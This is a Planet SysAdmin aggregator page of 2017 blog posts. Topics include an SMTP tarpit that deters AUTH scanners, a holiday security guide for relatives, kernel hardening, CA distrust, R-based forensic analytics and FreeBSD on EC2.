Planet SysAdmin


November 22, 2017

Chris Siebenmann

Delays on SMTP replies discourage apparent SMTP AUTH scanners

One of the things that my sinkhole SMTP server can do is trickle out all of its SMTP replies at a rate of one character every tenth of a second. This is a feature that I blatantly stole from OpenBSD's spamd when I read about it years ago, mostly because it seemed like a good idea. The effects of doing this have been interesting, because there's a real split in the results.
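
As a rough illustration of the trickle mechanism (this is not the actual sinkhole server's code), here is a minimal Python sketch of a listener that dribbles an SMTP greeting banner out one character every tenth of a second; the port number and banner text are arbitrary placeholders.

import socket
import time

# Hypothetical banner and port; a real sinkhole would listen on ordinary SMTP ports.
BANNER = "220 sinkhole.example.com ESMTP service ready\r\n"

def serve_slow_banner(host="0.0.0.0", port=2525, delay=0.1):
    # Accept SMTP clients and trickle the greeting out one byte at a time.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn:
                try:
                    for ch in BANNER:
                        conn.sendall(ch.encode("ascii"))
                        time.sleep(delay)  # one character every tenth of a second
                except (BrokenPipeError, ConnectionResetError):
                    pass  # impatient scanners often hang up before the banner finishes

if __name__ == "__main__":
    serve_slow_banner()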

At the moment I have my sinkhole server listening on two IP addresses. One IP address is the MX target for some long-standing host names that collect a bunch of spam. The other IP address used to be the MX target for one such host, but that ended several months ago; it's run an SMTP server for years, though. As far as I've seen, all spam email attempts come to the first IP address and those senders are generally completely indifferent to the slow output they're getting. I'm not really surprised by this; real mail software is going to be willing to cope with relatively slow responses because there are all sorts of reasons they can happen, including overloaded destination systems. Even if you're writing your own software, you have to go out of your way to have timeouts so fast that they'd trigger on my responses.

(There was a day when some spam software working through compromised end machines and open proxies would respond to slow 'tarpit' responses by disconnecting, but I'm not convinced anything does that any more. However, I haven't attempted to do any real study of this, partly because it's hard to sort out noise from signal in my current setup.)

Things are very different on the second IP, the one that isn't an MX target of anything currently but which used to run an SMTP server. There, there is a huge number of IP addresses that connect and then disconnect before my greeting banner even finishes trickling out. When I've turned my slow replies tarpit off to see what these connections looked like, they've all turned out to behave like SMTP AUTH scanners. Some of them will EHLO (often with suggestive names) and then disconnect when they don't see AUTH advertised in my EHLO greeting; others will go through the EHLO and then start blindly spitting AUTH LOGIN requests at me. Not infrequently they'll do this repeatedly, or with a lot of concurrent connections, or both.

(To my surprise I don't think any of them ever tried STARTTLS, which I do advertise and which SMTP authentication is often gated behind.)

We have a very simple connection time delay in our external mail gateway and now that I check, we are seeing a certain number of Exim messages about 'unexpected disconnection while reading SMTP command from ...'. However, I'm not sure how far these connections have gotten before then. They do generally seem to have hostnames typical of end-user IPs, just like the connections I see to my second IP, so it's possible that these are attempts at SMTP AUTH probing.

(We probably don't care enough to bother adding logging that would tell us. It's not exactly actionable information; everyone with exposed IPs and services on the Internet is getting probed all the time.)

by cks at November 22, 2017 06:24 AM

November 21, 2017

Errata Security

Your Holiday Cybersecurity Guide

Many of us are visiting parents/relatives this Thanksgiving/Christmas, and will have an opportunity to help them with cybersecurity issues. I thought I'd write up a quick guide of the most important things.

1. Stop them from reusing passwords

By far the biggest threat to average people is that they re-use the same password across many websites, so that when one website gets hacked, all their accounts get hacked.

To demonstrate the problem, go to haveibeenpwned.com and enter the email address of your relatives. This will show them a number of sites where their password has already been stolen, like LinkedIn, Adobe, etc. That should convince them of the severity of the problem.
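
If you want to check several relatives at once rather than typing addresses into the website, a small script against the Have I Been Pwned API can do it. This is a minimal sketch assuming the unauthenticated v2 breachedaccount endpoint that was available at the time of writing (the current API version requires an API key); the addresses are placeholders.

import time
import requests

ADDRESSES = ["mom@example.com", "dad@example.com"]  # placeholder addresses

for addr in ADDRESSES:
    url = "https://haveibeenpwned.com/api/v2/breachedaccount/" + addr
    # The service rejects requests without a descriptive User-Agent and rate-limits lookups.
    resp = requests.get(url, headers={"User-Agent": "holiday-password-checkup"})
    if resp.status_code == 200:
        names = [b["Name"] for b in resp.json()]
        print(addr, "appears in breaches:", ", ".join(names))
    elif resp.status_code == 404:
        print(addr, "not found in any known breach")
    else:
        print(addr, "lookup failed with HTTP status", resp.status_code)
    time.sleep(2)  # stay well under the rate limit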

They don't need a separate password for every site. For the majority of websites, you don't care whether they get hacked. Use a common password for all the meaningless sites. You only need unique passwords for important accounts, like email, Facebook, and Twitter.

Write down passwords and store them in a safe place. Sure, it's a common joke that people in offices write passwords on Post-It notes stuck on their monitors or under their keyboards. This is a common security mistake, but that's only because the office environment is widely accessible. Your home isn't, and there's plenty of places to store written passwords securely, such as in a home safe. Even if it's just a desk drawer, such passwords are safe from hackers, because they aren't on a computer.

Write them down, with pen and paper. Don't put them in a MyPasswords.doc, because when a hacker breaks in, they'll easily find that document and easily hack your accounts.

You might help them out with getting a password manager, or two-factor authentication (2FA). Good 2FA like YubiKey will stop a lot of phishing threats. But this is difficult technology to learn, and of course, you'll be on the hook for support issues, such as when they lose the device. Thus, while 2FA is best, I'm only recommending pen-and-paper to store passwords. (AccessNow has a guide, though I think YubiKey/U2F keys for Facebook and GMail are the best).


2. Lock their phone (passcode, fingerprint, faceprint)

You'll lose your phone at some point. It has the keys to all your accounts, like email and so on. With your email, phone thieves can then reset the passwords on all your other accounts. Thus, it's incredibly important to lock the phone.

Apple has made this especially easy with fingerprints (and now faceprints), so there's little excuse not to lock the phone.

Note that Apple iPhones are the most secure. I give my mother my old iPhones so that she will have something secure.

My mom demonstrates a problem you'll have with the older generation: she doesn't reliably have her phone with her, and charged. She's the opposite of my dad, who is religiously attached to his phone. Even a small change like making her lock her phone means it'll be even more likely she won't have it with her when you need to call her.


3. WiFi (WPA)

Make sure their home WiFi is WPA encrypted. It probably already is, but it's worthwhile checking.

The password should be written down on the same piece of paper as all the other passwords. This is important. My parents just moved, Comcast installed a WiFi access point for them, and they promptly lost the piece of paper. When I wanted to debug something on their network today, they didn't know the password, and couldn't find the paper. Get that password written down in a place it won't get lost!

Discourage them from extra security features like "SSID hiding" and/or "MAC address filtering". They provide no security benefit, and actually make security worse. It means a phone has to advertise the SSID when away from home, and it makes MAC address randomization harder, both of which allow you to be tracked.

If they have a really old home router, you should probably replace it, or at least update the firmware. A lot of old routers have vulnerabilities that allow hackers (like me, masscanning the Internet) to easily break in.


4. Ad blockers or Brave

Most of the online tricks that will confuse your older parents will come via advertising, such as popups claiming "You are infected with a virus, click here to clean it". Installing an ad blocker in the browser, such as uBlock Origin, stops almost all of this nonsense.

For example, here's a screenshot of going to the "Speedtest" website to test the speed of my connection (I took this on the plane on the way home for Thanksgiving). Ignore the error (the plane's firewall blocks Speedtest) -- but instead look at the advertising banner across the top of the page insisting you need to download a browser extension. This is tricking you into installing malware -- the ad appears as if it's a message from Speedtest, but it's not. Speedtest is just selling advertising and has no clue what the banner says. This sort of thing needs to be blocked -- it fools even the technologically competent.

uBlock Origin for Chrome is the one I use. Another option is to replace their browser with Brave, a browser that blocks ads, but at the same time, allows micropayments to support websites you want to support. I use Brave on my iPhone.

A side benefit of ad blockers or Brave is that web surfing becomes much faster, since you aren't downloading all this advertising. The smallest NYtimes story is 15 megabytes in size due to all the advertisements, for example.


5. Cloud Backups

Do backups, in the cloud. It's a good idea in general, especially with the threat of ransomware these days.

In particular, consider your photos. Over time, they will be lost, because people make no effort to keep track of them. All hard drives will eventually crash, deleting your photos. Sure, a few key ones are backed up on Facebook for life, but the rest aren't.

There are so many excellent online backup services out there, like DropBox and Backblaze. Or, you can use the iCloud feature that Apple provides. My favorite is Microsoft's: I already pay $99 a year for Office 365 subscription, and it comes with 1-terabyte of online storage.


6. Separate email accounts

You should have three email accounts: work, personal, and financial.

First, you really need to separate your work account from personal. The IT department is already getting misdirected emails with your spouse/lover that they don't want to see. Any conflict with your work, such as getting fired, gives your private correspondence to their lawyers.

Second, you need a wholly separate account for financial stuff, like Amazon.com, your bank, PayPal, and so on. That prevents confusion with phishing attacks.

Consider, for example, a warning about phishing emails that impersonate the USPS. If you had split accounts, you could safely ignore it: the USPS would only have your financial email account, which gets no phishing attacks, because it's not widely known. When you receive the phishing attack on your personal email, you ignore it, because you know the USPS doesn't know your personal email account.

Phishing emails are so sophisticated that even experts can't tell the difference. Splitting financial from personal emails makes it so you don't have to tell the difference -- anything financial sent to personal email can safely be ignored.

7. Deauth those apps!

Twitter user @tompcoleman comments that we also need to deauth apps.

Social media sites like Facebook, Twitter, and Google encourage you to enable "apps" that work with their platforms, often demanding privileges to generate messages on your behalf. The typical scenario is that you use them only once or twice and forget about them.

A lot of them are hostile. For example, my niece's Twitter account would occasionally send out advertisements, and she didn't know why. It's because a long time ago, she enabled an app with the permission to send tweets for her. I had to sit down and get rid of most of her apps.

Now would be a good time to go through your relatives' Facebook, Twitter, and Google/GMail accounts and disable those apps. Don't be afraid to be ruthless -- they probably weren't using them anyway. Some will still be necessary. For example, Twitter for iPhone shows up in the list of Twitter apps. The URL for editing these apps for Twitter is https://twitter.com/settings/applications. The Google link is here (thanks @spextr). I don't know of simple URLs for Facebook, but you should find it somewhere under privacy/security settings.



8. Up-to-date software? maybe

I put this last because it can be so much work.

You should install the latest OS (Windows 10, macOS High Sierra), and also turn on automatic patching.

But remember it may not be worth the huge effort involved. I want my parents to be secure -- but not so secure that I have to deal with issues.

For example, when my parents updated their HP Print software, the icon on the desktop my mom usually uses to scan things in from the printer disappeared, and I needed to spend 15 minutes with her helping her find the new way to access the software.

However, I did get my mom a new netbook to travel with instead of the old WinXP one. I want to get her a Chromebook, but she doesn't want one.

For iOS, you can probably make sure their phones have the latest version without having these usability problems.

Conclusion

You can't solve every problem for your relatives, but these are the more critical ones.

by Robert Graham (noreply@blogger.com) at November 21, 2017 09:38 PM

Chris Siebenmann

Major version changes are often partly a signal about support

Recently (for some value of recently) I read The cargo cult of versioning (via). To simplify, one of the things that it advocates is shifting the major version number to being part of the package name:

Next, move the major version to part of the name of a package. "Rails 5.1.4" becomes "Rails-5 (1, 4)". By following Rich Hickey's suggestion above, we also sidestep the question of what the default version should be. There's just no way to refer to a package without its major version.

I am biased to see versioning as ultimately a social thing. Looking at major version number changes through that lens, I feel that one of their social uses is being overlooked by this suggested change.

Many projects take what is effectively the default approach of having a single unified home page, a single repository, and so on, not separate home pages, repositories, and so on for each major version. In these setups, incrementing the major version number of your project and advertising the shift is a strong social signal that past major versions are no longer being supported unless you say otherwise. If you move from mypackage version 1.2.3 to mypackage version 2.0.0, you're signalling not just an API change but also that by default there will not be a mypackage 1.2.4. In fact you're further signalling that people should not build (new) projects using mypackage version 1.2.3; if they do so anyway, they're going to have to go to extra work to fish an old tag out of your repository or an old tarball out of your 'archived past versions' download area.

As I see it, this works because people think of there being a single project 'mypackage', not two separate projects 'mypackage version 1' and 'mypackage version 2'. Since there is only one project, it's relatively clear that by default it only has one actively developed major version, the latest, since I don't think people expect most projects to be working in several directions at once.

(Where projects have diverged from this model the result has often been confusion and annoyance. The case I'm closest to is Python, where having both 'Python 2' and 'Python 3' has caused all sorts of problems. But I'm not sure that calling them 'Python-2' and 'Python-3' would have helped. Incompatible major version changes in major projects appear to be a problem, period.)

I initially thought that you'd have problems getting this clear signal in a world where things were 'mypackage-1' and 'mypackage-2' instead of 'mypackage version ...'. Now, though, I'm not so sure. You'd probably have to be more explicit on your project web pages, which might not be such a bad thing, but it might be clear enough to people in general.

by cks at November 21, 2017 04:36 AM

November 20, 2017

Errata Security

Why Linus is right (as usual)

People are debating this email from Linus Torvalds (maintainer of the Linux kernel). It has strong language, like:

Some security people have scoffed at me when I say that security
problems are primarily "just bugs".
Those security people are f*cking morons.
Because honestly, the kind of security person who doesn't accept that
security problems are primarily just bugs, I don't want to work with.

I thought I'd explain why Linus is right.

Linus has an unwritten manifesto of how the Linux kernel should be maintained. It's not written down in one place, instead we are supposed to reverse engineer it from his scathing emails, where he calls people morons for not understanding it. This is one such scathing email. The rules he's expressing here are:
  • Large changes to the kernel should happen in small iterative steps, each one thoroughly debugged.
  • Minor security concerns aren't major emergencies; they don't allow bypassing the rules more than any other bug/feature.
Last year, some security "hardening" code was added to the kernel to prevent a class of buffer-overflow/out-of-bounds issues. This code didn't address any particular 0day vulnerability, but was designed to prevent a class of future potential exploits from being exploited. This is reasonable.

This code had bugs, but that's no sin. All code has bugs.

The sin, from Linus's point of view, is that when an overflow/out-of-bounds access was detected, the code would kill the user-mode process or kernel. Linus thinks it should have only generated warnings, and let the offending code continue to run.

Of course, that would in theory make the change of little benefit, because it would no longer prevent 0days from being exploited.

But warnings would only be temporary, the first step. There are likely to be bugs in the large code change, and it would probably uncover bugs in other code. While bounds-checking is a security issue, its first implementation will always find existing code with bounds bugs. Or, it'll have "false positives", triggering on things that aren't actually the flaws it's looking for. Killing things made these bugs worse, causing catastrophic failures in the latest kernel that didn't exist before. Warnings, however, would have equally highlighted the bugs, but without causing catastrophic failures. My car runs multiple copies of Linux -- such catastrophic failures would risk my life.

Only after a year, when the bugs have been fixed, would the default behavior of the code be changed to kill buggy code, thus preventing exploitation.

In other words, large changes to the kernel should happen in small, manageable steps. This hardening hasn't existed for 25 years of the Linux kernel, so there's no emergency requiring it be added immediately rather than conservatively, no reason to bypass Linus's development processes. There's no reason it couldn't have been warnings for a year while working out problems, followed by killing buggy code later.

Linus was correct here. No vuln has appeared in the last year that this code would've stopped, so the fact that it killed processes/kernels rather than generated warnings was unnecessary. Conversely, because it killed things, bugs in the kernel code were costly, and required emergency patches.

Despite his unreasonable tone, Linus is a hugely reasonable person. He's not trying to stop changes to the kernel. He's not trying to stop security improvements. He's not even trying to stop processes from getting killed. That's not why people are moronic. Instead, they are moronic for not understanding that large changes need to be made conservatively, and security issues are no more important than any other feature/bug.




Update: Also, since most security people aren't developers, they are also a bit clueless about how things actually work. Bounds-checking, which they define as purely a security feature to stop buffer-overflows, is actually overwhelmingly a debugging feature. Developers know this; security "experts" tend not to. These kernel changes were made by security people who failed to understand this, who failed to realize that their changes would uncover lots of bugs in existing code, and that killing buggy code was hugely inappropriate.

Update: Another flaw developers are intimately familiar with is how "hardening" code can cause false-positives, triggering on non-buggy code. A good example is where the BIND9 code crashed on an improper assert(). This hardening code designed to prevent exploitation made things worse by triggering on valid input/code.

Update: No, it's probably not okay to call people "morons" as Linus does. They may be wrong, but they usually are reasonable people. On the other hand, security people tend to be sanctimonious bastards with rigid thinking, so after he has dealt with that minority, I can see why Linus treats all security people that way.

by Robert Graham (noreply@blogger.com) at November 20, 2017 09:19 PM

Chris Siebenmann

StartCom gives up on its Certificate Authority business

The big news recently in the web browser SSL world is that StartCom has officially given up on being a CA because, as I put it on Twitter, no one trusts them any more. As far as I know, this makes StartCom the first CA to go out of business merely because of dubious practices and shady business practices (ie, quietly selling themselves to WoSign), instead of total security failures (DigiNotar) or utter incompetence (ipsCA). I consider this a great thing for the overall health and security of the browser CA ecology, because it shows that browsers are now not afraid to use their teeth.

StartCom is far from unique in having dubious practices (although they may have had the most occurrences). All sorts of CAs have them (or have had them), and in the past those CAs have generally skated by with only minor objections from the browsers; no one seemed ready to actually drop a CA over these practices, perhaps partly because of the collective action problem here. As a result, CAs had very little incentive to not be a bit sloppy and dubious. Are your customers prepared to spend enough money on SHA1 certificates even though you shouldn't issue them any more? Well, perhaps you can find a way around that. And so on.

The good news is that those days are over now, and StartCom going out of business (apparently along with WoSign) shows the consequences of ignoring that. At least Mozilla and Chrome are demonstrably willing to remove CAs for mere sloppy behavior and dubious practices, even if they're still moving slowly on it (IE and Safari are more opaque here). Tighter CA standards benefit web security in the obvious way, and reducing the number of CAs and trusted CA certificates out there is one way to deal with the core security problem of TLS on the web. Unsurprisingly, I'm in favour of this. In practice we put a huge amount of trust in CAs, so I think that CAs need to be held to a high standard and punished when they fail or are sloppy.

(The next CA on the chopping block is Symantec, perhaps even after DigiCert buys their assets; Mozilla is somewhat dubious.)

Sidebar: My personal view of StartCom

In the past, I got free certificates through StartCom (in the form of StartSSL). Part of StartSSL's business model was giving away basic certificates for free and then charging for revocation, which looked reasonably fair until Heartbleed happened. After Heartbleed, the nice thing for StartCom to do would have been to waive the fee to revoke and re-issue current certificates; this would have neatly dealt with the dilemma of practical reactions to the possible private key compromise. You can probably guess what happened next; StartCom declined to do so. Even in the light of Heartbleed, they stuck to their 'pay us money' policy. As a result, I'm confident that lots of people did not revoke certificates and probably a decent number did not even roll them over (since that would have required paying another CA for new certificates).

From that point on, I disliked StartCom/StartSSL. When Let's Encrypt provided an alternate source of free TLS certificates, I was quite happy to leave them behind. Looking back now, it's clear to me that StartCom didn't actually care very much about TLS and web security; they cared mostly or entirely about making money, and if their policies caused real TLS security issues (such as people staying with potentially exposed certificate keys), well, tough luck. They could get away with it, so they did it.

by cks at November 20, 2017 04:02 AM

HolisticInfoSec.org

toolsmith #129 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 2

You can have data without information, but you cannot have information without data. ~Daniel Keys Moran

Here we resume our discussion of DFIR Redefined: Deeper Functionality for Investigators with R as begun in Part 1.
First, now that my presentation season has wrapped up, I've posted the related material on the Github for this content. I've specifically posted the most recent version as presented at SecureWorld Seattle, which included Eric Kapfhammer's contributions and a bit of his forward thinking for next steps in this approach.
When we left off last month I parted company with you in the middle of an explanation of analysis of emotional valence, or "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation", using R and the Twitter API. It's probably worth your time to go back and refresh with the end of Part 1. Our last discussion point was specific to the popularity of negative tweets versus positive tweets with a cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly give us better understanding of an attacker collective's sentiment, particularly where the collective is vocal via social media. Teeing off the popularity of negative versus positive sentiment, we can assess the actual words fueling such sentiment analysis. It doesn't take us much R code to achieve our goal using the apply family of functions. The likes of apply, lapply, and sapply allow you to manipulate slices of data from matrices, arrays, lists and data frames in a repetitive way without having to use loops. We use code here directly from Michael Levy, Social Scientist, and his Playing with Twitter Data post.

polWordTables = 
  sapply(pol, function(p) {
    words = c(positiveWords = paste(p[[1]]$pos.words[[1]], collapse = ' '), 
              negativeWords = paste(p[[1]]$neg.words[[1]], collapse = ' '))
    gsub('-', '', words)  # Get rid of nothing found's "-"
  }) %>%
  apply(1, paste, collapse = ' ') %>% 
  stripWhitespace() %>% 
  strsplit(' ') %>%
  sapply(table)

par(mfrow = c(1, 2))
invisible(
  lapply(1:2, function(i) {
    dotchart(sort(polWordTables[[i]]), cex = .5)
    mtext(names(polWordTables)[i])
  }))

The result is a tidy visual representation of exactly what we learned at the end of Part 1, results as noted in Figure 1.

Figure 1: Positive vs negative words
Content including words such as killed, dangerous, infected, and attacks is definitely more interesting to readers than words such as good and clean. Sentiment like this could definitely be used to assess potential attacker outcomes and behaviors just prior to, or in the midst of, an attack, particularly in DDoS scenarios. Couple sentiment analysis with the ability to visualize networks of retweets and mentions, and you could zoom in on potential leaders or organizers. The larger the network node, the more retweets, as seen in Figure 2.

Figure 2: Who is retweeting who?
Remember our initial premise, as described in Part 1, was that attacker groups often use associated hashtags and handles, and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. Note that our dominant retweets are for @joe4security, @HackRead, and @defendmalware (not actual attackers, but bloggers talking about attacks, used here for example's sake). Figure 3 shows us who is mentioning who.

Figure 3: Who is mentioning who?
Note that @defendmalware mentions @HackRead. If these were actual attackers it would not be unreasonable to imagine a possible relationship between Twitter accounts that are actively retweeting and mentioning each other before or during an attack. Now let's assume @HackRead might be a possible suspect and you'd like to learn a bit more about possible additional suspects. In reality @HackRead HQ is in Milan, Italy. Perhaps Milan then might be a location for other attackers. I can feed in Twitter handles from my retweet and mentions network above, query the Twitter API with a very specific geocode, and lock it within five miles of the center of Milan.
The results are immediate per Figure 4.

Figure 4: GeoLocation code and results
Obviously, as these Twitter accounts aren't actual attackers, their retweets aren't actually pertinent to our presumed attack scenario, but they definitely retweeted @computerweekly (seen in retweets and mentions) from within five miles of the center of Milan. If @HackRead were the leader of an organization, and we believed that associates were assumed to be within geographical proximity, geolocation via the Twitter API could be quite useful. Again, these are all used as thematic examples, no actual attacks should be related to any of these accounts in any way.
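
The geocode query behind Figure 4 boils down to a single search call with a latitude,longitude,radius restriction. Here is a rough Python sketch of the same idea against the Twitter v1.1 search REST endpoint rather than the R code shown in the figure; the handle searched for, the Milan coordinates, and the OAuth credentials are illustrative placeholders.

import requests
from requests_oauthlib import OAuth1

# Placeholder credentials -- substitute your own Twitter API keys.
auth = OAuth1("CONSUMER_KEY", "CONSUMER_SECRET", "ACCESS_TOKEN", "ACCESS_SECRET")

params = {
    "q": "@HackRead",                 # a handle pulled from the retweet/mentions network
    "geocode": "45.4642,9.1900,5mi",  # lat,long,radius: within five miles of central Milan
    "count": 100,
}
resp = requests.get("https://api.twitter.com/1.1/search/tweets.json",
                    auth=auth, params=params)
resp.raise_for_status()

for tweet in resp.json()["statuses"]:
    print(tweet["user"]["screen_name"], "-", tweet["text"][:80])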

With the abundance of data, and often subjective or biased analysis, there are occasions where a quick, authoritative decision can be quite beneficial. Fast-and-frugal trees (FFTs) to the rescue. FFTs are simple algorithms that facilitate efficient and accurate decisions based on limited information.
Nathaniel D. Phillips, PhD created FFTrees for R to allow anyone to easily create, visualize and evaluate FFTs. Malcolm Gladwell has said that "we are suspicious of rapid cognition. We live in a world that assumes that the quality of a decision is directly related to the time and effort that went into making it.” FFTs, and decision trees at large, counter that premise and aid in the timely, efficient processing of data with the intent of a quick but sound decision. As with so much of information security, there is often a direct correlation with medical, psychological, and social sciences, and the use of FFTs is no different. Often, predictive analysis is conducted with logistic regression, used to "describe data and to explain the relationship between one dependent binary variable and one or more nominal, ordinal, interval or ratio-level independent variables." Would you prefer logistic regression or FFTs?

Figure 5: Thanks, I'll take FFTs
Here's a textbook information security scenario, often rife with subjectivity and bias. After a breach, and a subsequent third party risk assessment that generated a ton of CVSS data, make a fast decision about what treatments to apply first. Because everyone loves CVSS.

Figure 6: CVSS meh
Nothing like a massive table, scored by base, impact, exploitability, temporal, environmental, modified impact, and overall scores, all assessed by a third party assessor who may not fully understand the complexities or nuances of your environment. Let's say our esteemed assessor has decided that there are 683 total findings, of which 444 are non-critical and 239 are critical. Will FFTrees agree? Nay! First, a wee bit of R code.

library("FFTrees")
cvss <- read.csv("c:/coding/R/cvss.csv")
cvss.fft <- FFTrees(formula = critical ~ ., data = cvss)
plot(cvss.fft, what = "cues")
plot(cvss.fft,
     main = "CVSS FFT",
     decision.names = c("Non-Critical", "Critical"))


Guess what, the model landed right on impact and exploitability as the most important inputs, and not just because it's logically so, but because of their position when assessed for where they fall in the area under the curve (AUC), where the specific curve is the receiver operating characteristic (ROC). The ROC is a "graphical plot that illustrates the diagnostic ability of a binary classifier system as its discrimination threshold is varied." As for the AUC, accuracy is measured by the area under the ROC curve where an area of 1 represents a perfect test and an area of .5 represents a worthless test. Simply, the closer to 1, the better. For this model and data, impact and exploitability are the most accurate as seen in Figure 7.

Figure 7: Cue rankings prefer impact and exploitability
The fast and frugal tree made its decision where impact and exploitability with scores equal to or less than 2 were non-critical and exploitability greater than 2 was labeled critical, as seen in Figure 8.

Figure 8: The FFT decides
Ah hah! Our FFT sees things differently than our assessor. With a 93% average for performance fitting (this is good), our tree, making decisions on impact and exploitability, decides that there are 444 non-critical findings and 222 critical findings, a 17 point differential from our assessor. Can we all agree that mitigating and remediating critical findings can be an expensive proposition? If you, with just a modicum of data science, can make an authoritative decision that saves you time and money without adversely impacting your security posture, would you count it as a win? Yes, that was rhetorical.

Note that the FFTrees function automatically builds several versions of the same general tree that make different error trade-offs with variations in performance fitting and false positives. This gives you the option to test variables and make potentially even more informed decisions within the construct of one model. Ultimately, fast frugal trees make very fast decisions on 1 to 5 pieces of information and ignore all other information. In other words, "FFTrees are noncompensatory, once they make a decision based on a few pieces of information, no additional information changes the decision."

Finally, let's take a look at monitoring user logon anomalies in high volume environments with Time Series Regression (TSR). Much of this work comes courtesy of Eric Kapfhammer, our lead data scientist on our Microsoft Windows and Devices Group Blue Team. The ideal Windows Event ID for such activity is clearly 4624: an account was successfully logged on. This event is typically one of the top 5 events in terms of volume in most environments, and has multiple type codes including Network, Service, and RemoteInteractive.
User accounts will begin to show patterns over time, in aggregate, including:
  • Seasonality: day of week, patch cycles, 
  • Trend: volume of logons increasing/decreasing over time
  • Noise: randomness
You could look at 4624 with a Z-score model, which sets a threshold based on the number of standard deviations away from an average count over a given period of time, but this is a fairly simple model. The higher the value, the greater the degree of “anomalousness”.
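
For a concrete feel of that simpler Z-score approach (not the TSR model itself), here is a minimal Python sketch that flags any day whose logon count sits more than three standard deviations from the trailing average; the daily counts are made-up placeholder data.

from statistics import mean, stdev

# Hypothetical daily counts of Event ID 4624 Type 10 logons for one account.
daily_logons = [4, 6, 5, 7, 5, 6, 4, 5, 6, 5, 7, 6, 5, 4, 6, 31]

def zscore_anomalies(counts, window=14, threshold=3.0):
    # Flag days whose count sits more than `threshold` standard deviations
    # from the mean of the preceding `window` days.
    anomalies = []
    for i in range(window, len(counts)):
        history = counts[i - window:i]
        mu, sigma = mean(history), stdev(history)
        if sigma == 0:
            continue  # no variation in the window, nothing to score against
        z = (counts[i] - mu) / sigma
        if abs(z) > threshold:
            anomalies.append((i, counts[i], round(z, 2)))
    return anomalies

for day, count, z in zscore_anomalies(daily_logons):
    print("day %d: %d logons (z-score %.2f)" % (day, count, z))
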
Preferably, via Time Series Regression (TSR), your feature set is richer:
  • Statistical method for predicting a future response based on the response history (known as autoregressive dynamics) and the transfer of dynamics from relevant predictors
  • Understand and predict the behavior of dynamic systems from experimental or observational data
  • Commonly used for modeling and forecasting of economic, financial and biological systems
How to spot the anomaly in a sea of logon data?
Let's imagine our user, DARPA-549521, in the SUPERSECURE domain, with 90 days of aggregate 4624 Type 10 events by day.

Figure 9: User logon data
With 210 lines of R, including comments, log reading, file output, and graphing, we can visualize and alert on DARPA-549521's data, as seen in Figure 10.

Figure 10: User behavior outside the confidence interval
We can detect when a user's account exhibits changes in its seasonality as it relates to a confidence interval established (learned) over time. In this case, on 27 AUG 2017, the user topped her threshold of 19 logons, thus triggering an exception. Now imagine using this model to spot anomalous user behavior across all users and you get a good feel for the model's power.
Eric points out that there are, of course, additional options for modeling including:
  • Seasonal and Trend Decomposition using Loess (STL)
    • Handles any type of seasonality ~ can change over time
    • Smoothness of the trend-cycle can also be controlled by the user
    • Robust to outliers
  • Classification and Regression Trees (CART)
    • Supervised learning approach: teach trees to classify anomaly / non-anomaly
    • Unsupervised learning approach: focus on top-day hold-out and error check
  • Neural Networks
    • LSTM / Multiple time series in combination
These are powerful next steps in your capabilities. I want you to be brave and creative: go forth and add elements of data science and visualization to your practice. R and Python are well supported and broadly used for this mission and can definitely help you detect attackers faster, contain incidents more rapidly, and enhance your in-house detection and remediation mechanisms.
All the code that I can share is here; sorry, I can only share the TSR example without the source.
All the best in your endeavors!
Cheers...until next time.

by Russ McRee (noreply@blogger.com) at November 20, 2017 12:27 AM

November 17, 2017

Errata Security

How to read newspapers

News articles don't contain the information you think. Instead, they are written according to a formula, and that formula is as much about distorting/hiding information as it is about revealing it.

A good example is the following. I claimed hate-crimes aren't increasing. The tweet below tries to disprove me, by citing a news article that claims the opposite:




But the data behind this article tells a very different story than the words.

Every November, the FBI releases its hate-crime statistics for the previous year. They've been doing this every year for a long time. When they do so, various news organizations grab the data and write a quick story around it.

By "story" I mean a story. Raw numbers don't interest people, so the writer instead has to wrap it in a narrative that does interest people. That's what the writer has done in the above story, leading with the fact that hate crimes have increased.

But is this increase meaningful? What do the numbers actually say?

To answer this, I went to the FBI's website, the source of this data, and grabbed the numbers for the last 20 years, and graphed them in Excel, producing the following graph:


As you can see, there is no significant rise in hate-crimes. Indeed, the latest numbers are about 20% below the average for the last two decades, despite a tiny increase in the last couple of years. Statistically/scientifically, there is no change, but you'll never read that in a news article, because it's boring and readers won't pay attention. You'll only get a "news story" that weaves a narrative that interests the reader.

So back to the original tweet exchange. The person used the news story to disprove my claim, but going to the underlying data, it only supports my claim that hate-crimes are going down, not up -- the small increases of the past couple of years are insignificant compared to the larger decreases of the last two decades.

So that's the point of this post: news stories are deceptive. You have to double-check the data they are based upon, and pay less attention to the narrative they weave, and even less attention to the title designed to grab your attention.


Anyway, as a side-note, I'd like to apologize for being human. The snark/sarcasm of the tweet above gives me extra pleasure in proving them wrong :).

by Robert Graham (noreply@blogger.com) at November 17, 2017 10:55 PM

Colin Percival

FreeBSD/EC2 on C5 instances

Last week, Amazon released the "C5" family of EC2 instances, continuing their trend of improving performance by both providing better hardware and reducing the overhead associated with virtualization. Due to the significant changes in this new instance family, Amazon gave me advance notice of their impending arrival several months ago, and starting in August I had access to (early versions of) these instances so that I could test FreeBSD on them. Unfortunately the final launch date took me slightly by surprise — I was expecting it to be later in the month — so there are still a few kinks which need to be worked out for FreeBSD to run smoothly on C5 instances. I strongly recommend that you read the rest of this blog post before you use FreeBSD on EC2 C5 instances. (Or possibly skip to the end if you're not interested in learning about any of the underlying details.)

November 17, 2017 01:45 AM

November 15, 2017

Everything Sysadmin

Productivity When You Just Can't Even

Ryn Daniels has written an excellent piece about time management and productivity when you are burned out. The advice is spot on. I also do these things when I'm not feeling my best.

"It's one thing to talk about productivity when you're already feeling motivated and productive, but how do you get things done when it's hard to even make it through the day?"

https://superyesmore.com/productivity-when-you-just-cant-even-0c73d6a1f086209af420c2ced442a2e8

by Tom Limoncelli at November 15, 2017 05:00 PM

November 14, 2017

LZone - Sysadmin

USB seq nnnn is taking a long time

When your dmesg/journalctl/syslog says something like
Nov 14 21:43:12 Wolf systemd-udevd[274]: seq 3634 '/devices/pci0000:00/0000:00:14.0/usb2/2-1' is taking a long time
then know that the only proper manly response can be
systemctl restart udev
